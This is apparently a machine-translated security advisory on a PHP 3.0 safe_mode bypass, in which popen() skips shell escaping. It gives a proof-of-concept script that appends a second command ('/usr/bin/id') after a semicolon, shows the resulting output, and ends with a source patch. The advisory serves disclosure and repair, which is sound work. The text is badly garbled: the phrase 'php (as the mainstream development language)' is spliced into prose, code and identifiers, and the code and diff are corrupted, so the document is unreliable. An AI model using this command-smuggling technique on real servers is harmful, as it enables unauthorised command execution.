PHP3safe_mode failure vulnerability

Affected systems: & nbsp; php (as the mainstream development language) 3.00 & nbsp; description: & nbsp; & nbsp; & n affected systems: php (as the mainstream development language) 3.00
--------------------------------------------------------------------------------
Description:

Php (as the mainstream development language) Version 3.0 is an HTML embedded scripting language. Most of its syntaxes are transplanted to C, Java, and Perl and combined
Php (as the mainstream development language) features. This language allows web developers (which accounts for a large proportion of current program development) to quickly create dynamic web pages.

Because it runs on the web server and allows users to execute code, php (as the mainstream development language) has built-in security features called safe_mode,
It is used to control the execution of commands in the webroot environment that allows php (as the current mainstream development language) operations.

The implementation mechanism is to send shell commands to EscapeShellCmd () through a system call that enforces shell commands ()
This function is used to confirm that commands cannot be executed outside the webroot directory.

In some versions of php (as the mainstream development language), when the popen () command is used, EscapeShellCmd () becomes invalid, causing malicious users
To use the popen system call for illegal operations.

--------------------------------------------------------------------------------
Test procedure:

Warning: the following procedures (methods) may be offensive and only for security research and teaching. Users are at your own risk!

<? Php (as the mainstream development language)
$ Fp = popen ("ls-l/opt/bin;/usr/bin/id", "r ");
Echo "$ fp <br> n ";
While ($ line = fgets ($ fp, 1024 )):
Printf ("% s <br> n", $ line );
Endwhile;
Pclose ($ fp );
Php (as the mainstream development language) info ();
?>

The output result is as follows:

1
Total 53
-Rwxr-xr-x 1 root 52292 Jan 3 22:05 ls
Uid = 30 (wwwrun) gid = 65534 (nogroup) groups = 65534 (nogroup)
And from the configuration values of php (as the mainstream development language) info ():
Safe_mode 0 1

--------------------------------------------------------------------------------
Suggestion:
Index: functions/file. c
========================================================== ======================================
RCS file:/repository/php (as the mainstream development language) 3/functions/file. c, v
Retrieving revision 1.229
Retrieving revision 1.230
Diff-u-r1.229-r1.230
--- Functions/file. c 2000/01/01 04:31:15 1.229
++ Functions/file. c 2000/01/03 21:31:31 1.230
-26,7 + 26,7 @@
| Authors: Rasmus Lerdorf <rasmus@lerdorf.on.ca> |
+ ---------------------------------------------------------------------- +
*/
-/* $ Id: file. c, v 1.229 2000/01/01 04:31:15 sas Exp $ */
+/* $ Id: file. c, v 1.230 2000/01/03 21:31:31 kk Exp $ */
# Include "php (as the mainstream development language). h"
# Include <stdio. h>
@-51,6 + 51,7 @@
# Include "safe_mode.h"
# Include "php (as the mainstream development language) 3_list.h"
# Include "php (as the mainstream development language) 3_string.h"
+ # Include "exec. h"
# Include "file. h"
# If HAVE_PWD_H
# If MSVC5

@-575,7 + 576,7 @@
Pval * arg1, * arg2;
FILE * fp;
Int id;
-Char * p;
+ Char * p, * tmp = NULL;
Char * B, buf [1024];
TLS_VARS;

@-600,7 + 601,11 @@
} Else {
Snprintf (buf, sizeof (buf), "% s/% s", php (as the mainstream development language) 3_ini.safe_mode_exec_dir, arg1-> value. str. val );
}

-Fp = popen (buf, p );

+
+ Tmp = _ php (as the mainstream development language) 3_escapeshellcmd (buf );
+ Fp = popen (tmp, p );
+ Efree (tmp);/* temporary copy, no longer necessary */
+
If (! Fp ){
Php (as the mainstream development language) 3_error (E_WARNING, "popen (" % s "," % s ")-% s", buf, p, strerror (errno ));
RETURN_FALSE;